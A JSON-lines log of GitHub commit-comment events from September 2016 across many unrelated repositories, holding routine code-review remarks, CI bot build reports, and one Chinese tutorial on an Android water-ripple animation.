{"id":"4607623850","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19143816,"position":null,"line":null,"path":null,"commit_id":"591ebb22c0b54f92cf3798a32d53d657345d68e6","created_at":"2016-09-23T09:53:46Z","updated_at":"2016-09-23T09:53:46Z","body":"@snicolet As we use type_of(piece_on(from) already in lines 1021, 1022\r\nit also would probably be nicer to move line 1042 ( nextVictim = type_of(piece_on(from)); ) to line 1017\r\nand then use nextVictim in lines 1021, 1022"}},"created_at":"2016-09-23T09:53:46Z"}
{"id":"4607629513","type":"CommitCommentEvent","actor":{"login":"ikkez"},"repo":{"name":"bcosca/fatfree-core"},"payload":{"comment":{"id":19143831,"position":null,"line":null,"path":null,"commit_id":"9c1e1d7b9f08a3dc3be569657db7ce2b6f8ce16c","created_at":"2016-09-23T09:55:01Z","updated_at":"2016-09-23T09:55:01Z","body":"Hmm, I'm not fully understanding what this does. Does it a fix a special use case? "}},"created_at":"2016-09-23T09:55:01Z"}
{"id":"4607631596","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19143834,"position":27,"line":10,"path":"src/main/java/medic/gateway/alert/GatewayEventLogActivity.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T09:55:27Z","updated_at":"2016-09-23T09:55:27Z","body":"you could drop \"Gateway\" out of names, that would make them shorter. "}},"created_at":"2016-09-23T09:55:27Z"}
{"id":"4607636862","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19143849,"position":51,"line":51,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T09:56:33Z","updated_at":"2016-09-23T09:56:33Z","body":"I'd be cool with calling that class just `Adapter`, and the other one just `Loader`. "}},"created_at":"2016-09-23T09:56:33Z"}
{"id":"4607638041","type":"CommitCommentEvent","actor":{"login":"ceoy"},"repo":{"name":"motivationsbanner/client"},"payload":{"comment":{"id":19143857,"position":null,"line":null,"path":null,"commit_id":"d5ad9548d59dccbaaaa16d5be1bc12a7f2343e44","created_at":"2016-09-23T09:56:48Z","updated_at":"2016-09-23T09:56:48Z","body":"Ripdibip"}},"created_at":"2016-09-23T09:56:48Z"}
{"id":"4607638082","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19143859,"position":null,"line":null,"path":null,"commit_id":"a0f4c57da7487b2779f72011c2debbeb657a5082","created_at":"2016-09-23T09:56:48Z","updated_at":"2016-09-23T09:56:48Z","body":"It's kind of funny that we've been using the three quarters of the fishtest computing power for one week for a -0.6 Elo patch :-)"}},"created_at":"2016-09-23T09:56:48Z"}
{"id":"4607638176","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143860,"position":18,"line":25,"path":"correction-septembre-2016/dalliet-sylvain/teapot_create.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:56:49Z","updated_at":"2016-09-23T09:56:49Z","body":"Je dois dire aussi que je m'attendais plus à voir un cercle de teapots, mais pourquoi pas !"}},"created_at":"2016-09-23T09:56:49Z"}
{"id":"4607644236","type":"CommitCommentEvent","actor":{"login":"TWiStErRob"},"repo":{"name":"google/android-testing-support-library"},"payload":{"comment":{"id":19143873,"position":null,"line":null,"path":null,"commit_id":"7dc73975ac9d330378d26568256acd48898e01f2","created_at":"2016-09-23T09:58:07Z","updated_at":"2016-09-23T09:58:07Z","body":"+1 for the (intentional?) typo in the commit message!"}},"created_at":"2016-09-23T09:58:07Z"}
{"id":"4607644662","type":"CommitCommentEvent","actor":{"login":"estellecomment"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19143874,"position":20,"line":20,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T09:58:12Z","updated_at":"2016-09-23T09:58:12Z","body":"Are there different logs, apart from the EventLog? Can you call it just Log? (maybe confusing with the app's log... )"}},"created_at":"2016-09-23T09:58:12Z"}
{"id":"4607645701","type":"CommitCommentEvent","actor":{"login":"MrFrangipane"},"repo":{"name":"MrFrangipane/initiation-python"},"payload":{"comment":{"id":19143875,"position":99,"line":85,"path":"correction-septembre-2016/dalliet-sylvain/teapot_create.py","commit_id":"0ceb89253713d7c80a8611738ffd3da321535798","created_at":"2016-09-23T09:58:27Z","updated_at":"2016-09-23T09:58:27Z","body":"Attention à bien supprimer les lignes inutiles au moment de mettre le code en production"}},"created_at":"2016-09-23T09:58:27Z"}
{"id":"4607646926","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19143877,"position":51,"line":51,"path":"src/main/java/medic/gateway/alert/GatewayEventLogFragment.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T09:58:43Z","updated_at":"2016-09-23T09:58:43Z","body":"Check line 46 for why that's not possible ^^"}},"created_at":"2016-09-23T09:58:43Z"}
{"id":"4607647015","type":"CommitCommentEvent","actor":{"login":"loveseejoy"},"repo":{"name":"loveseejoy/WeiXinTools"},"payload":{"comment":{"id":19143878,"position":null,"line":null,"path":null,"commit_id":"50c25349cb6dd92b446373780a13e7a8ac526cd0","created_at":"2016-09-23T09:58:44Z","updated_at":"2016-09-23T09:58:44Z","body":"哈哈 不错"}},"created_at":"2016-09-23T09:58:44Z"}
{"id":"4607649397","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19143886,"position":9,"line":13,"path":"src/Images/ViewModels/ConceptIllustrationPage.json.cs","commit_id":"41e27303f248bb780181971ce401d7613db2a375","created_at":"2016-09-23T09:59:12Z","updated_at":"2016-09-23T09:59:12Z","body":"Why add the same helper twice?"}},"created_at":"2016-09-23T09:59:12Z"}
{"id":"4607650160","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-gateway"},"payload":{"comment":{"id":19143888,"position":27,"line":10,"path":"src/main/java/medic/gateway/alert/GatewayEventLogActivity.java","commit_id":"3490e32183c6502c560ee4b3033fb7da7c0cd0aa","created_at":"2016-09-23T09:59:23Z","updated_at":"2016-09-23T09:59:23Z","body":"Yeah, would be nice to make this less of a mouthful."}},"created_at":"2016-09-23T09:59:23Z"}
{"id":"4607652217","type":"CommitCommentEvent","actor":{"login":"rkorytkowski"},"repo":{"name":"openmrs/openmrs-module-owa"},"payload":{"comment":{"id":19143895,"position":36,"line":49,"path":"omod/src/main/java/org/openmrs/module/owa/web/controller/SettingsFormController.java","commit_id":"188325699e60cef9c960d17c4fb8a7a0a7b4d1e7","created_at":"2016-09-23T09:59:51Z","updated_at":"2016-09-23T09:59:51Z","body":"Here's the only actual change. Basically if the property is blank then set it to \"/owa\" by default."}},"created_at":"2016-09-23T09:59:51Z"}
{"id":"4611537685","type":"CommitCommentEvent","actor":{"login":"shubhssb"},"repo":{"name":"mapsplugin/cordova-plugin-googlemaps"},"payload":{"comment":{"id":19154772,"position":null,"line":null,"path":null,"commit_id":"144c0a5181d281c5f755793e7f6967f72bd75c98","created_at":"2016-09-24T00:00:43Z","updated_at":"2016-09-24T00:00:43Z","body":"thanks"}},"created_at":"2016-09-24T00:00:43Z"}
{"id":"4611538675","type":"CommitCommentEvent","actor":{"login":"codetricity"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19154778,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-24T00:01:06Z","updated_at":"2016-09-24T00:01:06Z","body":"> Quick question, is that the latest version of the code from NCTech? Where did you get the current version from? And are we good to use it in open source code?\r\n\r\nI got the code from the development team at NCTech originally by email. I told them I was using it for the RICOH THETA prior to them sending it to me. It's under the GPL. They are fine with us using it in open source projects. Keep the copyright text file in the new repo. I can't remember how much we modified it prior to putting it into the repo. We were thinking of using it for the Hackathon.\r\n\r\nThey may have a newer version out by now. Their base may be different by this point.\r\nhttps://www.nctechimaging.com/iris360-osc/\r\n"}},"created_at":"2016-09-24T00:01:06Z"}
{"id":"4611539300","type":"CommitCommentEvent","actor":{"login":"jcasman"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19154781,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-24T00:01:19Z","updated_at":"2016-09-24T00:01:19Z","body":"Hey kgoedecke!\r\n\r\nMy name is Jesse, I work with Craig. I've been wanting to set up the unofficial theta dev community as an organization for quite a while. It would be fantastic if you want to help. It doesn't look very hard to setup, but I haven't done it before. Have you? I'll try to get to it this weekend. \r\n\r\nAnd yea, too bad you can't make it to the meetup. Maybe next time!\r\n\r\nJesse"}},"created_at":"2016-09-24T00:01:19Z"}
{"id":"4611543635","type":"CommitCommentEvent","actor":{"login":"yan0302"},"repo":{"name":"yan0302/problem-design"},"payload":{"comment":{"id":19154799,"position":null,"line":null,"path":null,"commit_id":"f9848c30fe214389a8afc88a6f8c2c15d1f6be94","created_at":"2016-09-24T00:03:01Z","updated_at":"2016-09-24T00:03:01Z","body":"[fake data.xlsx](https://github.com/yan0302/problem-design/files/490851/fake.data.xlsx)"}},"created_at":"2016-09-24T00:03:01Z"}
{"id":"4611545482","type":"CommitCommentEvent","actor":{"login":"RobR1111"},"repo":{"name":"RobR1111/AtScaleDemo"},"payload":{"comment":{"id":19154803,"position":null,"line":null,"path":null,"commit_id":"876fc16ad287ac373e3a5bd86597eef6bccfd67d","created_at":"2016-09-24T00:03:49Z","updated_at":"2016-09-24T00:03:49Z","body":"byebye"}},"created_at":"2016-09-24T00:03:49Z"}
{"id":"4611547364","type":"CommitCommentEvent","actor":{"login":"thinkpad4"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19154808,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-24T00:04:31Z","updated_at":"2016-09-24T00:04:31Z","body":"Python's installer is like just the important bits of python the program needs?  Not the whole python program?"}},"created_at":"2016-09-24T00:04:31Z"}
{"id":"4611547897","type":"CommitCommentEvent","actor":{"login":"zda"},"repo":{"name":"meedan/check-web"},"payload":{"comment":{"id":19154812,"position":null,"line":null,"path":null,"commit_id":"58c6880c734e53c2f2ff7d62fc17966b84ba0aa1","created_at":"2016-09-24T00:04:43Z","updated_at":"2016-09-24T00:04:43Z","body":"Just realized I screwed up a rebase so this commit and the previous must be taken together to make sense. (Moving the submit button inside the form tags went into the previous commit.)"}},"created_at":"2016-09-24T00:04:43Z"}
{"id":"4611550757","type":"CommitCommentEvent","actor":{"login":"Alucard648"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19154825,"position":null,"line":null,"path":null,"commit_id":"6c3ab21ad51d3fd094be018987d95b50b17d2642","created_at":"2016-09-24T00:05:54Z","updated_at":"2016-09-24T00:05:54Z","body":"Speaking of search engine: I am suggesting an option: Select all items that fit into search query. For instance:\r\n1. Editing all items of specific ID.\r\n2. Check if the layer has correct contents. Items on wrong layers are common errors."}},"created_at":"2016-09-24T00:05:54Z"}
{"id":"4611554376","type":"CommitCommentEvent","actor":{"login":"himajin315"},"repo":{"name":"shimitakax/internet_software_2016_b2teama"},"payload":{"comment":{"id":19154843,"position":null,"line":null,"path":null,"commit_id":"f67cad1c9e799781fee5683a7fa757fb3919631d","created_at":"2016-09-24T00:07:29Z","updated_at":"2016-09-24T00:07:29Z","body":"`.gitignore` には `/tmp/`が書かれているから、`/tmp/`はgitで管理していないディレクトリですよね。\r\n```zsh\r\n$ git rm -rf tmp\r\n```\r\n\r\n一度削除しておいたら、管理下に入らないと思います 👍 "}},"created_at":"2016-09-24T00:07:29Z"}
{"id":"4611554925","type":"CommitCommentEvent","actor":{"login":"sbstp"},"repo":{"name":"streamlink/streamlink"},"payload":{"comment":{"id":19154847,"position":null,"line":null,"path":null,"commit_id":"183cb75deb08004ff09fab31a18b6f48721d8bc3","created_at":"2016-09-24T00:07:42Z","updated_at":"2016-09-24T00:07:42Z","body":"Right now it's the whole python program. It won't install it if there's already an install. The installer ends up about ~20 MiB. There's a way of using an embedded installer however, it makes much smaller files. Around ~6 MiB."}},"created_at":"2016-09-24T00:07:42Z"}
{"id":"4611555144","type":"CommitCommentEvent","actor":{"login":"kgoedecke"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19154850,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-24T00:07:47Z","updated_at":"2016-09-24T00:07:47Z","body":"Nice to e-meet you guys. \r\n\r\nI'm more than happy to help and I'm sure I can find a free minute this weekend. I will shoot you guys and email with my contact details!\r\n\r\nTalk to you soon.\r\n\r\nKevin"}},"created_at":"2016-09-24T00:07:47Z"}
{"id":"4611559517","type":"CommitCommentEvent","actor":{"login":"twinj"},"repo":{"name":"tomkwok/journey"},"payload":{"comment":{"id":19154869,"position":null,"line":null,"path":null,"commit_id":"6c02d9445a1f5c8f365fa409c2de59b8d104a12e","created_at":"2016-09-24T00:09:42Z","updated_at":"2016-09-24T00:09:42Z","body":"CleanHyphen or FormatCanonical are the default format. Just use NewV4().String(). Also uuid now supports scan."}},"created_at":"2016-09-24T00:09:42Z"}
{"id":"4611561062","type":"CommitCommentEvent","actor":{"login":"ggouaillardet"},"repo":{"name":"open-mpi/ompi"},"payload":{"comment":{"id":19154876,"position":null,"line":null,"path":null,"commit_id":"45dcf1f5d79a1872c7eec5e4456e58524003a2e6","created_at":"2016-09-24T00:10:21Z","updated_at":"2016-09-24T00:10:21Z","body":"@bosilca is the assembly timer always monotonic ?"}},"created_at":"2016-09-24T00:10:21Z"}
{"id":"4611561153","type":"CommitCommentEvent","actor":{"login":"hannabeasiam"},"repo":{"name":"Java-Import/test-github"},"payload":{"comment":{"id":19154878,"position":25,"line":25,"path":"README.md","commit_id":"7dd5b6b68a8843677185b35a42c6e97c96cb70f8","created_at":"2016-09-24T00:10:24Z","updated_at":"2016-09-24T00:10:24Z","body":"//**Need help with this line**"}},"created_at":"2016-09-24T00:10:24Z"}
{"id":"4611566697","type":"CommitCommentEvent","actor":{"login":"jcasman"},"repo":{"name":"codetricity/osc-server"},"payload":{"comment":{"id":19154896,"position":null,"line":null,"path":null,"commit_id":"d69ddb119d566b2947fd6e5e12f988602790dcbc","created_at":"2016-09-24T00:13:00Z","updated_at":"2016-09-24T00:13:00Z","body":"Thanks, Kevin!"}},"created_at":"2016-09-24T00:13:00Z"}
{"id":"4611570229","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154912,"position":null,"line":null,"path":null,"commit_id":"f0af189ca0892179a9359fb4600e79bfa11e66d6","created_at":"2016-09-24T00:14:34Z","updated_at":"2016-09-24T00:14:34Z","body":"I brought this commit into the codebase."}},"created_at":"2016-09-24T00:14:34Z"}
{"id":"4611571153","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154917,"position":null,"line":null,"path":null,"commit_id":"502e3ec2451cccb7a71b157098e9abff78778481","created_at":"2016-09-24T00:15:00Z","updated_at":"2016-09-24T00:15:00Z","body":"Do you want this commit to go into the codebase?"}},"created_at":"2016-09-24T00:15:00Z"}
{"id":"4611571427","type":"CommitCommentEvent","actor":{"login":"Wohlstand"},"repo":{"name":"WohlSoft/PGE-Project"},"payload":{"comment":{"id":19154919,"position":null,"line":null,"path":null,"commit_id":"6c3ab21ad51d3fd094be018987d95b50b17d2642","created_at":"2016-09-24T00:15:08Z","updated_at":"2016-09-24T00:15:08Z","body":"Nice idea, and I agree that it useful, (how I (and Kevin) forgot to add it before?)"}},"created_at":"2016-09-24T00:15:08Z"}
{"id":"4611571743","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154922,"position":null,"line":null,"path":null,"commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:15:15Z","updated_at":"2016-09-24T00:15:15Z","body":"Do you want this commit to go into the codebase?"}},"created_at":"2016-09-24T00:15:15Z"}
{"id":"4611573682","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154931,"position":5,"line":28,"path":"interface/forms/eye_mag/taskman.php","commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:16:04Z","updated_at":"2016-09-24T00:16:04Z","body":"This shouldn't be done in the main codebase."}},"created_at":"2016-09-24T00:16:04Z"}
{"id":"4611574357","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154936,"position":22,"line":3356,"path":"interface/forms/eye_mag/view.php","commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:16:21Z","updated_at":"2016-09-24T00:16:21Z","body":"shouldn;t translate this.\r\njust use text()"}},"created_at":"2016-09-24T00:16:21Z"}
{"id":"4611575154","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154938,"position":96,"line":1905,"path":"interface/forms/eye_mag/report.php","commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:16:46Z","updated_at":"2016-09-24T00:16:46Z","body":"text($providerNAME)"}},"created_at":"2016-09-24T00:16:46Z"}
{"id":"4611575352","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154941,"position":null,"line":null,"path":null,"commit_id":"91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150","created_at":"2016-09-24T00:16:51Z","updated_at":"2016-09-24T00:16:51Z","body":"4989-PreliminaryPIUTstatControl (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-91861fd2c6aa040aa4b94d55c9a9f3f00b3a1150-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T00:16:51Z"}
{"id":"4611575888","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154943,"position":34,"line":1876,"path":"interface/forms/eye_mag/report.php","commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:17:05Z","updated_at":"2016-09-24T00:17:05Z","body":"translate"}},"created_at":"2016-09-24T00:17:05Z"}
{"id":"4611579269","type":"CommitCommentEvent","actor":{"login":"bradymiller"},"repo":{"name":"ophthal/openEMR_2"},"payload":{"comment":{"id":19154954,"position":36,"line":46,"path":"interface/forms/eye_mag/php/taskman_functions.php","commit_id":"f6829d1bcf24e22307bd9e3966ddce95c440d549","created_at":"2016-09-24T00:18:40Z","updated_at":"2016-09-24T00:18:40Z","body":"use binding:\r\n$query = \"SELECT * FROM documents where encounter_id=? and foreign_id=? and url like ?\";\r\n$doc = sqlQuery($query,array($encounter,$pid, '%'.$filename.'%' ));"}},"created_at":"2016-09-24T00:18:40Z"}
{"id":"4611581375","type":"CommitCommentEvent","actor":{"login":"rafaelcp"},"repo":{"name":"rafaelcp/Open-Mega-Engine"},"payload":{"comment":{"id":19154961,"position":null,"line":null,"path":null,"commit_id":"050fd07fa93e980098072f1fb95f73edffb8226d","created_at":"2016-09-24T00:19:38Z","updated_at":"2016-09-24T00:19:38Z","body":"Don't worry, I'm very busy as well and probably will stop updating for a few days."}},"created_at":"2016-09-24T00:19:38Z"}
{"id":"4611583817","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19154965,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-24T00:20:31Z","updated_at":"2016-09-24T00:20:31Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-24T00:20:31Z"}
{"id":"4611597460","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19155006,"position":null,"line":null,"path":null,"commit_id":"42394a77ca33c6ca873069614fa0c01cf20a1695","created_at":"2016-09-24T00:26:53Z","updated_at":"2016-09-24T00:26:53Z","body":"129956735-WaterHeaterHeight (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2371 of 2379 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-42394a77ca33c6ca873069614fa0c01cf20a1695-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-24T00:26:53Z"}
{"id":"4611600113","type":"CommitCommentEvent","actor":{"login":"integracominf"},"repo":{"name":"azzaeelhg/SIPDEP"},"payload":{"comment":{"id":19155020,"position":null,"line":null,"path":null,"commit_id":"2d178d7ca3920e12b52587ebfbf8a7398929cd8b","created_at":"2016-09-24T00:28:07Z","updated_at":"2016-09-24T00:28:07Z","body":"¿de que se trató este commit?"}},"created_at":"2016-09-24T00:28:07Z"}
{"id":"4611609872","type":"CommitCommentEvent","actor":{"login":"liualbert99"},"repo":{"name":"liualbert99/dotfiles"},"payload":{"comment":{"id":19155057,"position":null,"line":null,"path":null,"commit_id":"9dc8904fb45e6ccdcf871a7c65dbc04b5f76f57d","created_at":"2016-09-24T00:33:00Z","updated_at":"2016-09-24T00:33:00Z","body":"Oh."}},"created_at":"2016-09-24T00:33:00Z"}
{"id":"4611616542","type":"CommitCommentEvent","actor":{"login":"Thyerry"},"repo":{"name":"Thyerry/IP_PROJ"},"payload":{"comment":{"id":19155075,"position":null,"line":null,"path":null,"commit_id":"47cb2b4b59ff69d72b9c8de819367fa7cc1cadfe","created_at":"2016-09-24T00:36:26Z","updated_at":"2016-09-24T00:36:26Z","body":"A"}},"created_at":"2016-09-24T00:36:26Z"}
{"id":"4611617995","type":"CommitCommentEvent","actor":{"login":"fedeillane"},"repo":{"name":"fedeillane/tp_laboratorio_1"},"payload":{"comment":{"id":19155078,"position":null,"line":null,"path":null,"commit_id":"c635c063aff631548be98fae6ce396630977cf4f","created_at":"2016-09-24T00:37:10Z","updated_at":"2016-09-24T00:37:10Z","body":"Profesor le quiero comentar que no pude poner el el MAX al valor correcto de 20. Lo tuve que dejar en 5 porque si lo aumentaba a 10 o a 20 el programa me tiraba error.\r\nLa verdad que fue un error que no contemple y ya no me queda mas tiempo.\r\nSolo queria que lo sepa.\r\nGracias.\r\nSaludos."}},"created_at":"2016-09-24T00:37:10Z"}
{"id":"4611618033","type":"CommitCommentEvent","actor":{"login":"zjxuzhj"},"repo":{"name":"zjxuzhj/WaterWave"},"payload":{"comment":{"id":19155079,"position":null,"line":null,"path":null,"commit_id":"59e05f5d26c4195e20f03515fa8b7fd35c171b2c","created_at":"2016-09-24T00:37:11Z","updated_at":"2016-09-24T00:37:11Z","body":"####自定义绚丽水波纹效果\r\n\r\n效果展示\r\n![效果展示](http://upload-images.jianshu.io/upload_images/1877523-0d20910b312692a4.gif?imageMogr2/auto-orient/strip)\r\n\r\n\r\n \r\n####需求\r\n---\r\n模拟水波纹的效果:点击屏幕就有圆环出现,半径从小到大,透明度从大到小(0为透明)\r\n\r\n####实现思路\r\n---\r\n1. 自定义类继承View。\r\n2. 定义每个圆环的实体类 Wave，并初始化绘制圆环的画笔的数据。\r\n2. 重写onTouchEvent方法，down时，获得坐标点，做为圆环圆心。\r\n3. 发送handler信息，对数据进行修改，刷新页面。\r\n4. 重写onDraw方法，绘制一个圆环。\r\n \r\n####1. 自定义类继承View\r\n---\r\n- 新建WaterWaveView2类继承View\r\n\r\n```\r\npublic class WaterWaveView2 extends View {\r\n \r\n    //存放圆环的集合\r\n    private ArrayList<Wave> mList;\r\n \r\n    //界面刷新\r\n    private Handler mHandler = new Handler() {\r\n        @Override\r\n        public void handleMessage(Message msg) {\r\n            invalidate();//刷新界面,会执行onDraw方法\r\n        }\r\n    };\r\n \r\n    public WaterWaveView2(Context context) {\r\n        this(context, null);\r\n    }\r\n \r\n    public WaterWaveView2(Context context, AttributeSet attrs) {\r\n        super(context, attrs);\r\n        mList = new ArrayList<Wave>();\r\n    }\r\n\r\n```\r\n\r\n####2. 定义实体类 Wave\r\n---\r\n\r\n```\r\n/**\r\n* Created by HongJay on 2016/8/30.\r\n* 把wave的数据封装成一个对象\r\n*/\r\npublic class Wave {\r\n    public float x;//圆心x坐标\r\n    public float y;//圆心y坐标\r\n    public Paint paint; //画圆的画笔\r\n    public float width; //线条宽度\r\n    public int radius; //圆的半径\r\n    public int ranNum;//随机数\r\n    public int[] randomColor={Color.BLUE,Color.CYAN,\r\n            Color.GREEN,Color.MAGENTA,Color.RED,Color.YELLOW};\r\n \r\n    public Wave(float x, float y) {\r\n        this.x = x;\r\n        this.y = y;\r\n        initData();\r\n    }\r\n    /**\r\n     * 初始化数据,每次点击一次都要初始化一次\r\n     */\r\n    private void initData() {\r\n        paint=new Paint();//因为点击一次需要画出不同的圆环\r\n        paint.setAntiAlias(true);//打开抗锯齿\r\n        ranNum=(int) (Math.random()*6);//[0,5]的随机数\r\n        paint.setColor(randomColor[ranNum]);//设置画笔的颜色\r\n        paint.setStyle(Paint.Style.STROKE);//描边\r\n        paint.setStrokeWidth(width);//设置描边宽度\r\n        paint.setAlpha(255);//透明度的设置(0-255),0为完全透明\r\n        radius=0;//初始化\r\n        width=0;\r\n    }\r\n}\r\n\r\n```\r\n\r\n####3. 重写onTouchEvent方法\r\n---\r\n- 获得圆心，并且删除集合中透明度为0的圆环，通知handler调用onDraw()方法\r\n\r\n```\r\npublic boolean onTouchEvent(MotionEvent event) {\r\n        super.onTouchEvent(event);\r\n        switch (event.getAction()) {\r\n            case MotionEvent.ACTION_DOWN:\r\n \r\n                float x = event.getX();\r\n                float y = event.getY();\r\n                deleteItem();\r\n                Wave wave = new Wave(x, y);\r\n                mList.add(wave);\r\n \r\n                //刷新界面\r\n                invalidate();\r\n                break;\r\n \r\n            case MotionEvent.ACTION_MOVE:\r\n                float x1 = event.getX();\r\n                float y1 = event.getY();\r\n                deleteItem();\r\n                Wave wave1 = new Wave(x1, y1);\r\n                mList.add(wave1);\r\n \r\n                invalidate();\r\n                break;\r\n        }\r\n        //处理事件\r\n        return true;\r\n    }\r\n    //删除透明度已经为0的圆环\r\n    private void deleteItem(){\r\n        for (int i = 0; i <mList.size() ; i++) {\r\n            if(mList.get(i).paint.getAlpha()==0){\r\n                mList.remove(i);\r\n            }\r\n        }\r\n    }\r\n}\r\n\r\n```\r\n\r\n####4. 重写onDraw()方法，循环绘制圆环\r\n```\r\nprotected void onDraw(Canvas canvas) {\r\n        super.onDraw(canvas);\r\n \r\n        //避免程序一运行就进行绘制\r\n        if (mList.size() > 0) {\r\n \r\n            //对集合中的圆环对象循环绘制\r\n            for (Wave wave : mList) {\r\n                canvas.drawCircle(wave.x, wave.y, wave.radius, wave.paint);\r\n                wave.radius += 3;\r\n                //对画笔透明度进行操作\r\n                int alpha = wave.paint.getAlpha();\r\n                if (alpha < 80) {\r\n                    alpha = 0;\r\n                } else {\r\n                    alpha -= 3;\r\n                }\r\n \r\n                //设置画笔宽度和透明度\r\n                wave.paint.setStrokeWidth(wave.radius / 8);\r\n                wave.paint.setAlpha(alpha);\r\n \r\n                //延迟刷新界面\r\n                mHandler.sendEmptyMessageDelayed(1, 100);\r\n            }\r\n        }\r\n    }\r\n\r\n```\r\n\r\n这里是[项目地址](https://github.com/zjxuzhj/WaterWave)。\r\n\r\n参考\r\nhttp://blog.csdn.net/cyp331203/article/details/41209357\r\nhttp://www.cnblogs.com/tangs/articles/5730470.html"}},"created_at":"2016-09-24T00:37:11Z"}
{"id":"4611623360","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":19155105,"position":null,"line":null,"path":null,"commit_id":"ad8e28c8cf2b447b726896e27f77596e9e4d3aeb","created_at":"2016-09-24T00:40:03Z","updated_at":"2016-09-24T00:40:03Z","body":"https://github.com/php-fusion/PHP-Fusion/blob/9.02/install/index.php#L637-L648."}},"created_at":"2016-09-24T00:40:03Z"}
